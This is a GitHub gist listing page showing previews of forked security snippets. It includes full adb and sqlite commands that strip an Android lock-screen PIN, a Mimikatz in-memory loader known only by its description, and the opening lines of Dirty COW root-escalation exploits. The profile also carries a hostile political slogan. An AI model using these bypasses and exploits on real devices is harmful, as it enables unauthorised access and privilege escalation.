Skip to content

Instantly share code, notes, and snippets.

View vaginessa's full-sized avatar
🎯
FCK ISRL ☠️

⭐ 🐾 vaginessa

🎯
FCK ISRL ☠️
View GitHub Profile
@vaginessa
vaginessa / androidpinremove.txt
Last active September 10, 2015 21:39 — forked from CHEF-KOCH/androidpinremove.txt
Remove Android PIN
This method requires:
- Root access and debugging* enabled
- Reboot recovery and follow code:
*if debugging is not enabled it can be done from any custom recovery
adb shell
# sqlite3 /data/data/com.android.providers.settings/databases/settings.db
sqlite> update secure set value=65536 where name='lockscreen.password_type';
sqlite> .exit
@vaginessa
vaginessa / Apentest2015
Last active June 9, 2019 06:04 — forked from CHEF-KOCH/Apentest2015
Android Penetration Testing Tools 2015
Android Penetration Testing Tools 2015
by CHEF-KOCH
==============
Note:
1. These apps are not for beginners because expertise is needed on the Android platform.
2. Most of the apps work on Rooted Android devices. So root your Android device first. If you are not sure how to do it, learn how to by, reading one of the many sites available to help with this process.
3. You will lose your device’s warranty if you root it, so think twice before proceeding.
4. These apps can also harm your Android device. So please try these apps at your own risk
@vaginessa
vaginessa / current_activity.sh
Created April 7, 2016 23:15 — forked from 109021017/current_activity.sh
A shell script log the current android top activity
oldActvity=""
displayName=""
currentActivity=`adb shell dumpsys window windows | grep -E 'mCurrentFocus'`
while true
do
if [[ $oldActvity != $currentActivity && $currentActivity != *"=null"* ]]; then
displayName=${currentActivity##* }
displayName=${displayName%%\}*}
echo $displayName
oldActvity=$currentActivity
using System;
using System.IO;
using System.Net;
using System.Text;
using System.IO.Compression;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
@vaginessa
vaginessa / netkatz.cs
Created May 29, 2016 12:00
Downloads and Executes Mimikatz In Memory From GitHub
using System;
using System.IO;
using System.Net;
using System.Text;
using System.IO.Compression;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
@vaginessa
vaginessa / SourceForge.user.js
Created June 18, 2016 14:50
Sourceforgeddl.user.js
// ==UserScript== // @name Direct links on Sourceforge download pages // @namespace http://www.amdmi3.ru/ // @copyright 2009-2011, Dmitry Marakasov <amdmi3@amdmi3.ru> // @license BSD // @include http://sourceforge.net/projects/* // @include http://www.sourceforge.net/projects/* // @include https://sourceforge.net/projects/* // @include https://www.sourceforge.net/projects/* // ==/UserScript== (function() { // !!! Change this to your favorite mirror !!! var mirror = "kent"; for(var i = 0; i < document.links.length; i++) { var elem = document.links[i]; if (elem.href.match(/\/projects\/([^\/]+)\/files\/(.+)\/download/i)) { elem.href="http://"+mirror+".dl.sourceforge.net/project/"+RegExp.$1+"/"+RegExp.$2; } } })();
/*
* CVE-2016-5195 dirtypoc
*
* This PoC is memory only and doesn't write anything on the filesystem.
* /!\ Beware, it triggers a kernel crash a few minutes.
*
* gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread
*/
#define _GNU_SOURCE
@vaginessa
vaginessa / naughtyc0w.c
Created October 27, 2016 02:40 — forked from mak/naughtyc0w.c
exploit for CVE-2016-5195 nothing fancy
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <sys/uio.h>
#include <sys/wait.h>
@vaginessa
vaginessa / c0w.c
Created October 27, 2016 02:41 — forked from KrE80r/c0w.c
PTRACE_POKEDATA variant of CVE-2016-5195
/*
* A PTRACE_POKEDATA variant of CVE-2016-5195
* should work on RHEL 5 & 6
*
* (un)comment correct payload (x86 or x64)!
* $ gcc -pthread c0w.c -o c0w
* $ ./c0w
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* mmap fa65a000